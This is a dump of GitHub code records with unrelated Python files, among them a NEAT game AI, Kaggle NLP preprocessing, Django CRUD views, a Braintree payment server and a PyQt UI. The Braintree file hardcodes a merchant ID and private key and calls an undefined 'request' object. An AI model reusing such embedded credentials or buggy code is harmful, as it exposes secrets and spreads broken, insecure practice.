dinosaur.Y_POS:\n dinosaur.dino_jump = True\n dinosaur.dino_run = False\n\n statistics()\n score()\n background()\n clock.tick(30)\n pygame.display.update()\n\n\n# Setting up the NEAT Neural Network\ndef run(config_path):\n global pop\n config = neat.config.Config(\n neat.DefaultGenome,\n neat.DefaultReproduction,\n neat.DefaultSpeciesSet,\n neat.DefaultStagnation,\n config_path\n )\n\n pop = neat.Population(config)\n pop.run(eval_genomes, 50)\n\n\nif __name__ == '__main__':\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config.txt')\n run(config_path)","repo_name":"lammjan/neat-Dino-AI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32696158434","text":"import matplotlib.pyplot as plt\nfrom sklearn.manifold import TSNE\n\nfrom news20.dataset import news20_data\nfrom news20.finetune import build_news20_model\n\n\ndef visualize(data, labels):\n numdim = data[0].shape[0]\n\n autoencoder, encoder = build_news20_model(numdim)\n\n autoencoder.load_weights('news20/models/final-model.hdf5')\n\n projections = encoder.predict(data)\n\n # tsne = TSNE(n_components=2, perplexity=20.0, learning_rate=1000, early_exaggeration=2)\n # projections = tsne.fit_transform(projections)\n\n plt.figure()\n plt.scatter(projections[:, 0], projections[:, 1], c=labels, s=1)\n plt.show()\n\n\nif __name__ == '__main__':\n data, labels = news20_data()\n visualize(data, labels)\n","repo_name":"vaaale/contrastive-divergence","sub_path":"news20/visualize_news20.py","file_name":"visualize_news20.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15422549460","text":"'''\n완전 탐색 문제\n\n1부터 n까지 문제에 적혀있는 대로 풀면 된다.\n - 어떤 자연수 N이 있을 때, 그 자연수 N의 분해합은 N과 N을 이루는 각 자리수의 합을 의미한다.\n - 245의 분해합은 256( = 245 + 2 + 4 + 5)\n\n1부터 n까지 돌면서 1씩 증가하는 반복문 내에서 분해합을 구하는 식 i + sum(map(int, str(i)))을 한 후에\n이 값이 입력받은 n과 같으면 해당 숫자를 출력하고 종료(어차피 1씩 증가하기 때문에 처음 res랑 n이 같을 경우가 가장 작은 생성자이다.)\n끝까지 돌았는데 없을 경우 0출력\n'''\n\nn = int(input())\n\n# 테스트\n# n = 216 # 198\n\nres = 0\n\nfor i in range(1, n + 1):\n res = i + sum(map(int, str(i)))\n\n if res == n:\n print(i)\n break\nelse:\n print(0)\n","repo_name":"rkdalsdn94/algoalgo","sub_path":"solved_ac/bronze_2/분해합_2231.py","file_name":"분해합_2231.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71049865531","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n\n# For example, here's several helpful packages to load in \n\n\n\nimport numpy as np # linear algebra\n\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n\n\n# Input data files are available in the \"../input/\" directory.\n\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\n\n\nimport os\n\nprint(os.listdir(\"../input\"))\n\n\n\n# Any results you write to the current directory are saved as output.\nimport numpy as np \n\nimport pandas as pd \n\nimport nltk\n\nimport os\n\nfrom nltk.tokenize import word_tokenize\n\nfrom nltk.stem import WordNetLemmatizer\n\nfrom bs4 import BeautifulSoup\n\nimport re\n\nfrom keras.utils import to_categorical\n\nimport random\n\nfrom tensorflow import set_random_seed\n\nfrom sklearn.model_selection import train_test_split\n\nfrom keras.preprocessing import sequence\n\nfrom keras.preprocessing.text import Tokenizer\n\nfrom keras.layers import Dense,Dropout,Embedding,LSTM\n\nfrom keras.callbacks import EarlyStopping\n\nfrom keras.losses import categorical_crossentropy\n\nfrom keras.optimizers import Adam\n\nfrom keras.models import Sequential\n\nfrom tqdm import tqdm\n\nimport warnings\n\nwarnings.filterwarnings(\"ignore\", category=UserWarning, module='bs4')\n\nlemmatizer = WordNetLemmatizer()\n\n\n\n#set random seed for the session and also for tensorflow that runs in background for keras\n\nset_random_seed(123)\n\nrandom.seed(123)\n\n\n\n\n\nprint(os.listdir(\"../input\"))\ntrain= pd.read_csv(\"../input/train.tsv\", sep=\"\\t\")\n\ntest = pd.read_csv(\"../input/test.tsv\", sep=\"\\t\")\n\n\n\ntrain.head()\ntrain.shape\ntest.head()\ndef clean_sentences(df):\n\n reviews = []\n\n\n\n for sent in tqdm(df['Phrase']):\n\n \n\n #remove html content\n\n review_text = BeautifulSoup(sent).get_text()\n\n \n\n #remove non-alphabetic characters\n\n review_text = re.sub(\"[^a-zA-Z]\",\" \", review_text)\n\n \n\n #tokenize the sentences\n\n words = word_tokenize(review_text.lower())\n\n \n\n #lemmatize each word to its lemma\n\n lemma_words = [lemmatizer.lemmatize(i) for i in words]\n\n \n\n reviews.append(lemma_words)\n\n\n\n return(reviews)\n\n\n\n#cleaned reviews for both train and test set retrieved\n\ntrain_sentences = clean_sentences(train)\n\ntest_sentences = clean_sentences(test)\n\nprint(len(train_sentences))\n\nprint(len(test_sentences))\ntarget=train.Sentiment.values\n\ny_target=to_categorical(target)\n\nnum_classes=y_target.shape[1]\nX_train,X_val,y_train,y_val=train_test_split(train_sentences,y_target,test_size=0.2,stratify=y_target)\n #It is needed for initializing tokenizer of keras and subsequent padding\n\n\n\nunique_words = set()\n\nlen_max = 0\n\n\n\nfor sent in tqdm(X_train):\n\n \n\n unique_words.update(sent)\n\n \n\n if(len_maxReport Date<,>Report\")\nelif (fileText[1] == \"onlyreturndates\"):\n print(\"Req No.<,>Report Date\")\nelse:\n print(\"ERROR: input file layout error\")\n sys.exit()\n\ndata = preprocess.getData()\n\nsimilarReports = search.search(\"lsi\",50,fileText[0])\nfor reportIdx in similarReports:\n year = random.randint(2000,int(fileText[2][0:4])-1)\n month = random.randint(1,12)\n date = random.randint(1,28)\n if (fileText[1] == \"notonlyreturndates\"):\n print(data[reportIdx[0]][0] + \"<,>\" + str(year) + str(month).zfill(2) + str(date).zfill(2) + \"<,>\" + data[reportIdx[0]][1])\n elif (fileText[1] == \"onlyreturndates\"):\n print(data[reportIdx[0]][0] + \"<,>\" + str(year) + str(month).zfill(2) + str(date).zfill(2))\n","repo_name":"ghcarneiro/rahrad","sub_path":"searchEngine.py","file_name":"searchEngine.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26104063391","text":"import http.client\nimport json\nconn = http.client.HTTPSConnection(\"api.smspartner.fr\")\n\npayload = json.dumps({\n\"apiKey\": \"your api key smspartner\", #remplacez par votre clé API SMSPartner\n\"phoneNumbers\": \"+336xxxxxxxx\", #remplacez par votre numéro de téléphone\n\"sender\": \"Your sender name\",\n\"gamme\": 1,\n\"message\": \"Cest un message test PYTHON\", #remplacez par votre message\n \"webhookUrl\": \"https://webhook.site/TOKEN\" #remplacez TOKEN par votre token webhook.site **cette ligne est optionnel**\n})\n\nheaders = {\n'Content-Type': 'application/json',\n'Content-Length': str(len(payload)),\n'cache-control': 'no-cache'\n}\n\nconn.request(\"POST\", \"/v1/send\", payload, headers) #Une requête POST est envoyée au serveur SMSPartner avec le chemin d'URL \"/v1/send\"\n\nres = conn.getresponse() #La réponse est ensuite stockée dans la variable res.\n\ndata = res.read() \n\nprint(data.decode(\"utf-8\")) #Cette ligne lit les données de la réponse HTTP.","repo_name":"AgustinGomezDelToro/SMS-API-PYTHON","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36045176217","text":"\"\"\"empty message\n\nRevision ID: 35ee0d6723ef\nRevises: 299feceab0d4\nCreate Date: 2023-03-14 21:43:44.131500\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '35ee0d6723ef'\ndown_revision = '299feceab0d4'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('posts', schema=None) as batch_op:\n batch_op.drop_column('author')\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('posts', schema=None) as batch_op:\n batch_op.add_column(sa.Column('author', mysql.VARCHAR(length=255), nullable=False))\n\n # ### end Alembic commands ###\n","repo_name":"as2229181/flask_picture","sub_path":"migrations/versions/35ee0d6723ef_.py","file_name":"35ee0d6723ef_.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27172824467","text":"\"\"\"\nCreated on Tue Dec 14 17:31 2021\n@author: pg\n\nProgram for handling mouse events\nGoals:\n\n- the user has a main image (in our case, the raman image displayed after applying data reduction methods)\n- the user wants to click on the specific part of the image and display the raman spectrum of the corresponding pixel.\n- the mouse event would extract a 1D array representing a single raman spectrum from the original dataset.\n- the mouse event would trigger plotting the extracted data on the figure.\n\n\"\"\"\nimport cv2\nimport numpy as np\nimport mat73\nimport matplotlib.pyplot as plt\n\nmatFile = mat73.loadmat('tissue_t3_1_workspace.mat')\nimage = matFile[\"m\"] #For the purpose of testing the function, the spectra come from different source, they are not coming from 'm' image\ndata = matFile['map_t3']\n\ndef printCoordinate(event,x,y,flags,params): # MOUSE CALL BACK FUNCTION, IT SHOULD TAKE 4 FOLLOWING PARAMETERS\n if event==cv2.EVENT_LBUTTONDOWN:\n strXY = '('+str(x)+','+str(y)+')'\n print(strXY) # prints x,y coordinates to terminal\n spectrum = data[x][y][:]\n title = 'spectrum of the pixel {}x{}'.format(x,y)\n plt.ion() # enables interactive mode - plots spectra on the same grap\n plt.plot(spectrum)\n plt.title(title)\n plt.show()\n\ncv2.imshow('Image',image)\n\n# Whenever a mouse even occurs we have to call the function:\ncv2.setMouseCallback('Image', printCoordinate) #Take 2 parameters:\n# - the window name on which look for the mouse event to occur,\n# - the function to be called whenever the mouse event occurs\n\ncv2.waitKey() # close the image whenever any key is pressed\ncv2.destroyAllWindows()\n","repo_name":"molbioeng/Visualisers","sub_path":"clickShowSpectrum.py","file_name":"clickShowSpectrum.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13807529949","text":"#!/usr/bin/env python3\n\nimport os\n\nimport braintree\n\nprint(braintree)\n\nbraintree.Configuration.configure(braintree.Environment.Sandbox,\n merchant_id=\"855p4hj8rkrnc5sd\",\n public_key=\"9k8zgmzxbfqyfz37\",\n private_key=\"78250b73760b6dbd2d97d4e04cdd7f93\")\n\n \nimport flask\napp = flask.Flask(__name__)\n\n@app.route(\"/client_token\", methods=[\"GET\"])\ndef client_token():\n return braintree.ClientToken.generate()\n\n@app.route(\"/payment-methods\", methods=[\"POST\"])\ndef create_purchase():\n nonce = request.form[\"payment_method_nonce\"]\n result = braintree.Transaction.sale({\n \"amount\": \"20.00\",\n \"payment_method_nonce\": nonce\n })\n return result.transaction.id\n\nif __name__ == \"__main__\":\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n","repo_name":"Sally-Yang-Jing-Ou/TwrlyPebble","sub_path":"braintree-server/thing.py","file_name":"thing.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"15146251492","text":"#Character stuffing \n\nflag = 'F'\nesc = 'E'\n\ndef byte_stuffing(text):\n global flag,esc\n bstuffed_data = ''\n bstuffed_data += flag\n for i in text:\n if i == flag:\n bstuffed_data += esc\n bstuffed_data += i \n elif i == esc:\n bstuffed_data += esc \n bstuffed_data += i \n else:\n bstuffed_data += i\n bstuffed_data += flag\n return bstuffed_data\n\n\ndef byte_destuffing(text):\n global flag,esc\n bdstuffed_text = ''\n added = False\n for i in range(1, len(text)-1):\n if added == True:\n added = False\n continue\n if text[i] == esc:\n if text[i+1] == flag or text[i+1] == esc:\n bdstuffed_text += text[i+1]\n added = True\n else:\n bdstuffed_text += text[i]\n return bdstuffed_text\n\n#Sample\n#Input : FDEFDFF\n#output : Stuffed - FEFDEEEFDEFEFF\n # Destuffed - FDEFDFF\n\ntext = input(\"Message: \")\nsenders_text = byte_stuffing(text)\nrecv_text = byte_destuffing(senders_text)\nprint(f\"Stuffed : {senders_text}\")\nprint(f\"Destuffed : {recv_text}\")\n\n","repo_name":"Rishit-Reddy/Computer-Networks-Lab-Programs","sub_path":"3_Bit&Character_stuffing_destuffing/char_stuffing_destuffing.py","file_name":"char_stuffing_destuffing.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10238448637","text":"from collections import Counter\r\nimport logging\r\n\r\ns = [1,1,2,2,3,3,3,3,3,1,2,4,5,3,4,5,5]\r\n\r\nd = Counter(s)\r\nprint(d.most_common)\r\nprint(max(d))\r\n\r\nd = lambda a,b : a ** b\r\nprint(d(5,3))\r\n\r\n\r\n\r\n","repo_name":"shivashanker525/Python_Intrvw_qstns","sub_path":"counter_p.py","file_name":"counter_p.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14025592173","text":"import numpy as np\nfrom .node import HealthNode\nfrom .consumers import ConsumerNode\n\n\nclass ResourceProducerNode(HealthNode, ConsumerNode):\n def __init__(\n self,\n id,\n *args,\n max_resource_production=100.0,\n resource_production_rate=10.0,\n resource_production_bias=10.0,\n production_damage_rate=100,\n **kwargs,\n ) -> None:\n super().__init__(id, *args, **kwargs)\n self.max_resource_production = max_resource_production\n self.resource_production_rate = resource_production_rate\n self.resource_production_bias = resource_production_bias\n self.production_damage_rate = production_damage_rate\n self.current_production = 0.0\n self.fails = 0\n\n def set_consumption(self):\n low_production = max(\n self.max_resource_production - self.resource_production_bias, 0.0\n )\n production = np.random.uniform(\n low=low_production, high=self.max_resource_production\n )\n self.current_consumption = production * self.resource_production_rate\n self.current_production = 0.0\n return super().set_consumption()\n\n def feed(self, power):\n if not self.allow_production():\n self.fails += 1\n return power\n if power <= 0:\n return 0.0\n used_power = min(power, self.current_consumption)\n production_reminder = self._produce(used_power)\n reminder = production_reminder + (power - used_power)\n if reminder > 0:\n self.status = ConsumerNode.Status.ON\n else:\n self.status = ConsumerNode.Status.PARTIAL\n\n return reminder\n\n def _produce(self, power):\n production = power / self.resource_production_rate\n production_damage = production / self.production_damage_rate\n if self.health < production_damage:\n production_damage = self.health\n production = self.health * self.production_damage_rate\n consumed_power = production * self.resource_production_rate\n self.health -= production_damage\n self.current_production += production\n self.current_consumption -= consumed_power\n return consumed_power\n\n def color(self):\n if self.status == ConsumerNode.Status.OFF:\n return \"pink\"\n elif self.status == ConsumerNode.Status.PARTIAL:\n return \"yellow\"\n elif self.status == ConsumerNode.Status.ON:\n return \"black\"\n\n def allow_production(self):\n \"\"\"Allow production if the node has health\"\"\"\n p = np.random.uniform(0.0, 1.0) ** 2\n p *= 100\n return self.health > p\n\n def repair(self, resources):\n self.fails = 0\n return super().repair(resources)\n\n def size(self):\n return 200 * (self.current_production + 1)\n\n def to_json(self):\n parent_node = super().to_json()\n node = {\n \"id\": self.id,\n \"type\": \"ResourceProducer\",\n \"max_resource_production\": self.max_resource_production,\n \"resource_production_rate\": self.resource_production_rate,\n \"resource_production_bias\": self.resource_production_bias,\n \"production_damage_rate\": self.production_damage_rate,\n }\n parent_node.update(node)\n return parent_node\n","repo_name":"dfg-98/IA-SIM","sub_path":"models/producers.py","file_name":"producers.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5980224439","text":"from django.shortcuts import render,redirect\nfrom app01 import models\nfrom django import forms\nfrom django.core.validators import RegexValidator\nfrom django.core.exceptions import ValidationError\nfrom django.utils.safestring import mark_safe\ndef depart_list(request):\n '''部门列表'''\n #去数据库获取所有的部门列表\n queryset=models.Department.objects.all()\n return render(request,'depart_list.html',{'queryset':queryset})\n\ndef depart_add(request):\n '''添加部门'''\n if request.method=='GET':\n return render(request, 'depart_add.html')\n\n #获取用户POST提交过来的数据(title输入为空)\n title=request.POST.get('title')\n #保存到数据库\n models.Department.objects.create(title=title)\n #重定向回部门列表\n return redirect('/depart_list/')\n\ndef depart_delete(request):\n #获取id\n nid = request.GET.get('nid')\n #删除\n models.Department.objects.filter(id=nid).delete()\n #重定向部门列表\n # 一般情况下会跳转到列表信息\n return redirect('/depart_list/')\n#通过nid,传参保留原本的数据\ndef depart_edit(request,nid):\n '''修改部门'''\n if request.method == 'GET':\n #根据nid,获取他的数据[obj,]\n row_object=models.Department.objects.filter(id=nid).first()\n print(row_object.id,row_object.title)\n return render(request,'depart_edit.html',{'row_object':row_object})\n\n # 获取用户POST提交过来的修改的数据\n title = request.POST.get('title')\n # 保存到数据库\n models.Department.objects.filter(id=nid).update(title=title)\n # 重定向回部门列表\n return redirect('/depart_list/')\n\ndef user_list(request):\n queryset = models.UserInfo.objects.all()\n return render(request, 'user_list.html', {'queryset': queryset})\n\ndef user_add(request):\n '''添加用户(最原始方法)'''\n if request.method=='GET':\n #context表示从models拿数据过来\n context={\n 'gender_choices':models.UserInfo.gender_choices,\n 'depart_list':models.Department.objects.all()}\n return render(request, 'user_add.html', context)\n\n\n #获取用户POST提交过来的数据(title输入为空)\n user=request.POST.get('user')\n pwd = request.POST.get('pwd')\n age = request.POST.get('age')\n account = request.POST.get('account')\n create_time = request.POST.get('create_time')\n depart_id = request.POST.get('depart_id')\n gender = request.POST.get('gender')\n\n\n\n\n # #获取用户提交的数据,将数据保存到数据库\n models.UserInfo.objects.create(name=user)\n models.UserInfo.objects.create(password=pwd)\n models.UserInfo.objects.create(age=age)\n models.UserInfo.objects.create(account=account)\n models.UserInfo.objects.create(create_time=create_time)\n models.UserInfo.objects.create(depart_id=depart_id)\n models.UserInfo.objects.create(gender=gender)\n\n #将添加的用户返回到用户列表,就是重定向回部门列表\n return redirect('/user_list/')\n\n\n\n#----------------modelform示例(#基于modelform版本)-------------------\nfrom django import forms\nclass UserModelForm(forms.ModelForm):\n class Meta:\n model=models.UserInfo\n fields=['name','password','age','account','create_time','gender','depart_id']\n #通过Django后台进行前端输入框的显示:第一种方式\n # widgets={\n # 'name':forms.TextInput(attrs={'class':'form-control'}),\n # 'password': forms.TextInput(attrs={'class': 'form-control'}),\n # 'age': forms.TextInput(attrs={'class': 'form-control'}),\n # }\n def __init__(self,*args,**kwargs):\n super().__init__(*args,**kwargs)\n #循环找到所有的插件,添加'class':'form-control',让前端页面输入框中显示灰色底部提示标题\n for name,field in self.fields.items():\n field.widget.attrs={'class':'form-control','placeholder':field.label}\n\ndef user_model_form_add(request):\n if request.method=='GET':\n form=UserModelForm()\n return render(request,'user_model_form_add.html',{'form':form})\n\n #用户提交数据,数据校验。\n form = UserModelForm(data=request.POST)\n if form.is_valid():\n #判断数据是否合法,保存到数据库(第一种)\n # print(form.cleaned_data)\n #一般情况form内部会识别到用户提交的数据,将用户提交的数据保存到数据库form.save()\n form.save()\n return redirect('/user_list/')\n # 校验失败并在页面上显示错误信息\n return render(request,'user_model_form_add.html',{'form':form})\n\ndef user_edit(request,nid):\n '''编辑用户'''\n #根据ID去数据库获取要编辑的那一行数据(对象)\n if request.method == 'GET':\n row_object=models.UserInfo.objects.filter(id=nid).first()\n form=UserModelForm(instance=row_object)\n return render(request,'user_edit.html',{'form':form})\n\n row_object = models.UserInfo.objects.filter(id=nid).first()\n form = UserModelForm(data=request.POST,instance=row_object)#更新到数据库\n if form.is_valid():\n form.save()\n return redirect('/user_list/')\n\n return render(request, 'user_edit.html', {'form': form})\n\ndef user_delete(request,nid):\n \n # 删除\n models.UserInfo.objects.filter(id=nid).delete()\n # 重定向部门列表\n # 一般情况下会跳转到列表信息\n return redirect('/user_list/')\n\n\ndef pretty_list(request):\n # 搜索框关键字搜索\n data_dict = {}\n search_data = request.GET.get('q', '') # 有值和空值\n if search_data:\n data_dict['mobile__contains'] = search_data\n res = models.PrettyNum.objects.filter(**data_dict)\n print(res)\n\n #此处添加循环是为了实现分页功能添加的数据使用\n # for i in range(300):\n # models.PrettyNum.objects.create(mobile='18697949601',price=10,level=1,status=1)\n page=int(request.GET.get('page',1))\n #第一种实现分页,实现每页显示10条数据\n # start=(page-1)*10\n # end=page*10\n #第二种可以进行定义变量,实现修改数字改变显示的数据条数\n page_num=10\n start = (page - 1) * page_num\n end = page * page_num\n\n\n\n\n\n #当数据过多时,在前端页面进行分页过于繁琐时,可以通过Django后台进行分页的一个循环\n page_str_list=[]\n\n # for i in range(1,21):\n #将page_string返回给前端页面展示,同时在下面的返回页面参数加上page_string\n #计算数据库有多少条数据,实现进行一个分页循环,其中循环21页显然是死代码,所以必须进行计算总条数\n total_count=models.PrettyNum.objects.filter(**data_dict).order_by('-level').count()\n\n #计算总页数, 将for i in range(1,21):的21替换成total_page_count+1\n total_page_count,div=divmod(total_count,page_num)#涉及到取余计算\n if div:\n total_page_count+=1\n\n for i in range(1, total_page_count+1):\n ele='
  • {}
  • '.format(i,i)\n page_str_list.append(ele)\n page_string=mark_safe(''.join(page_str_list))\n\n\n #select*from 表order by level desc;根据等级进行排序\n queryset = models.PrettyNum.objects.filter(**data_dict).order_by('-level')[start:end]#次处加上[start:end]是实现上面的分页功能\n return render(request, 'pretty_list.html', {'queryset': queryset,'search_data':search_data,'page_string':page_string})\n\n\nclass PrettyModelForm(forms.ModelForm):\n #使用正则表达式对添加手机号码时进行一个验证,方法一:\n mobile=forms.CharField(\n label='手机号',\n validators=[RegexValidator(r'^1[3-9]\\d{9}$','手机号格式错误')],\n )\n\n\n\n\n # # 通过构子的方法对添加手机号进行验证,第二种:\n # def clean_mobile(self):\n # txt_mobile=self.cleaned_data['mobile']\n #\n # if len(txt_mobile)!=11:\n # #杨验证不通过\n # raise ValidationError('格式错误')\n # #验证通过,用户输入的值返回\n # return txt_mobile\n\n\n\n\n class Meta:\n model=models.PrettyNum\n #展示字段内容第一种\n fields=['mobile','price','level','status']\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n # 循环找到所有的插件,添加'class':'form-control'\n for name, field in self.fields.items():\n field.widget.attrs = {'class': 'form-control', 'placeholder': field.label}\n\n # 当添加手机号时,数据库已经存在该号码,可以通过构子的方法对添加手机号进行重复验证功能,\n # 但此处功能存在运行错误,问题还未解决\n # def clean_mobile(self):\n # txt_mobile = self.cleaned_data['mobile']\n # exists = models.PrettyNum.objects.filter(models=txt_mobile).exists()\n #\n # if exists:\n # # 验证不通过\n # raise ValidationError('手机号码已经存在')\n # # 验证通过,用户输入的值返回\n # return txt_mobile\n\n\n\nclass PrettyEditModelForm(forms.ModelForm):\n\n\n #不修改手机号的情况下,但是使用此语句那么fields列表中必须加回原来的mobile\n # mobile=forms.CharField(disabled=True,label='手机号')\n #重新定义靓号编辑的类,与靓号增加的类进行一个区分使用\n class Meta:\n model=models.PrettyNum\n #展示字段内容方法一,当不展示手机号时可以进行去除,也可以使用语句mobile=forms.CharField(disabled=True,label='手机号')\n fields=['price','level','status']\n #展示字段第二种,表示展示全部\n # fields='__all__'\n #展示字段内容第三种,表示除了一下字段不展示,排除展示法\n # exclude=['level']\n #通过Django后台进行前端输入框的显示:第一种方式\n # widgets={\n # 'name':forms.TextInput(attrs={'class':'form-control'}),\n # 'password': forms.TextInput(attrs={'class': 'form-control'}),\n # 'age': forms.TextInput(attrs={'class': 'form-control'}),\n # }\n def __init__(self,*args,**kwargs):\n super().__init__(*args,**kwargs)\n #循环找到所有的插件,添加'class':'form-control'\n for name,field in self.fields.items():\n field.widget.attrs={'class':'form-control','placeholder':field.label}\n#还可以使用上面的正则表达式验证手机号的方法\n # mobile = forms.CharField(\n # label='手机号',\n # validators=[RegexValidator(r'^1[3-9]\\d{9}$', '手机号格式错误')],\n # )\n\n\n\n\n\ndef pretty_add(request):\n if request.method=='GET':\n form=PrettyModelForm()\n return render(request,'pretty_add.html',{'form':form})\n\n #用户提交数据,数据校验。\n form = PrettyModelForm(data=request.POST)\n if form.is_valid():\n #判断数据是否合法,保存到数据库(第一种)\n # print(form.cleaned_data)\n #一般情况form内部会识别到用户提交的数据,将用户提交的数据保存到数据库form.save()\n form.save()\n return redirect('/pretty_list/')\n # 校验失败并在页面上显示错误信息\n return render(request,'pretty_add.html',{'form':form})\n\ndef pretty_edit(request,nid):\n if request.method == 'GET':\n row_object = models.PrettyNum.objects.filter(id=nid).first()\n form = PrettyEditModelForm(instance=row_object)\n return render(request, 'pretty_edit.html', {'form': form})\n\n row_object = models.PrettyNum.objects.filter(id=nid).first()\n form = PrettyEditModelForm(data=request.POST, instance=row_object) # 更新到数据库\n if form.is_valid():\n form.save()\n return redirect('/pretty_list/')\n\n return render(request, 'pretty_edit.html', {'form': form})\n\n\ndef pretty_delete(request, nid):\n # 删除\n models.PrettyNum.objects.filter(id=nid).delete()\n # 重定向部门列表\n # 一般情况下会跳转到列表信息\n return redirect('/pretty_list/')\n\n#订单管理使用到ajax知识\n\nclass OrderModelForm(forms.ModelForm):\n\n class Meta:\n model=models.Order\n #展示字段内容第一种\n fields=['oid','title','price','status','admin']\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n # 循环找到所有的插件,添加'class':'form-control'\n for name, field in self.fields.items():\n field.widget.attrs = {'class': 'form-control', 'placeholder': field.label}\n\ndef order_list(request):\n queryset = models.UserInfo.objects.all()\n return render(request, 'order_list.html', {'queryset': queryset})\n\n\ndef order_add(request):\n if request.method=='GET':\n form=OrderModelForm()\n return render(request,'order_add.html',{'form':form})\n\n #用户提交数据,数据校验。\n form = OrderModelForm(data=request.POST)\n if form.is_valid():\n #判断数据是否合法,保存到数据库(第一种)\n # print(form.cleaned_data)\n #一般情况form内部会识别到用户提交的数据,将用户提交的数据保存到数据库form.save()\n form.save()\n return redirect('/order_list/')\n # 校验失败并在页面上显示错误信息\n return render(request,'order_add.html',{'form':form})\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"whiteshirt5/python-django","sub_path":"app01/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13455,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"16996333887","text":"from PyQt5.QtWidgets import *\nfrom PyQt5 import QtGui, QtCore\nfrom PyQt5.QtGui import QIcon, QFont, QCursor, QPixmap\nfrom PyQt5.QtCore import Qt, QSize, QCoreApplication\nimport sys\nimport airCargoTrack\nimport seaCargoTrack\n\nair = {'Air France':\"\",'Air Royal':\"\",'Ethiopian':\"\",'Turkish Airlines':\"\",'DHL':\"\",'FedEx':\"\",'UPS Air Cargo' : \"\",'EgyptAir':\"\",'British Airways':\"\"}\nctnList = []\n\nclass Ui_self(QWidget):\n def __init__(self):\n super().__init__()\n if not self.objectName():\n self.setObjectName(u\"self\")\n self.verticalLayout_2 = QVBoxLayout(self)\n self.verticalLayout_2.setObjectName(u\"verticalLayout_2\")\n self.verticalLayout = QVBoxLayout()\n self.verticalLayout.setObjectName(u\"verticalLayout\")\n self.title = QLabel(self)\n self.title.setObjectName(u\"title\")\n font = QFont()\n font.setPointSize(14)\n font.setBold(True)\n font.setWeight(75)\n self.title.setFont(font)\n self.title.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout.addWidget(self.title)\n\n self.horizontalLayout = QHBoxLayout()\n self.horizontalLayout.setObjectName(u\"horizontalLayout\")\n self.horizontalLayout.setContentsMargins(8, 10, 8, 10)\n self.trackingNumFrame = QFrame(self)\n self.trackingNumFrame.setObjectName(u\"trackingNumFrame\")\n self.trackingNumFrame.setMinimumSize(QSize(0, 0))\n self.trackingNumFrame.setMaximumSize(QSize(16777215, 30))\n self.trackingNumFrame.setStyleSheet(u\"background-color : white;\\n\"\n\"border : 1px solid gray;\\n\"\n\"border-radius : 10px;\")\n self.trackingNumFrame.setFrameShape(QFrame.StyledPanel)\n self.trackingNumFrame.setFrameShadow(QFrame.Raised)\n self.horizontalLayout_2 = QHBoxLayout(self.trackingNumFrame)\n self.horizontalLayout_2.setObjectName(u\"horizontalLayout_2\")\n self.searchIco = QLabel(self.trackingNumFrame)\n self.searchIco.setObjectName(u\"searchIco\")\n self.searchIco.setSizeIncrement(QSize(0, 0))\n self.searchIco.setStyleSheet(u\"background-color : transparent;\\n\"\n\"border : none;\")\n self.searchIco.setPixmap(QPixmap(u\":/icon/search.svg\"))\n self.searchIco.setScaledContents(True)\n\n self.horizontalLayout_2.addWidget(self.searchIco)\n\n self.trackingNumberLine = QLineEdit(self.trackingNumFrame)\n self.trackingNumberLine.setObjectName(u\"trackingNumberLine\")\n self.trackingNumberLine.setStyleSheet(u\"background-color : transparent;\\n\"\n\"border : none;\")\n self.trackingNumberLine.textChanged.connect(self.textChamps)\n\n self.horizontalLayout_2.addWidget(self.trackingNumberLine)\n\n\n self.horizontalLayout.addWidget(self.trackingNumFrame)\n\n self.typeShipment = QComboBox(self)\n self.typeShipment.addItem(\"\")\n self.typeShipment.addItem(\"\")\n self.typeShipment.addItem(\"\")\n self.typeShipment.setObjectName(u\"typeShipment\")\n self.typeShipment.setMinimumSize(QSize(0, 30))\n 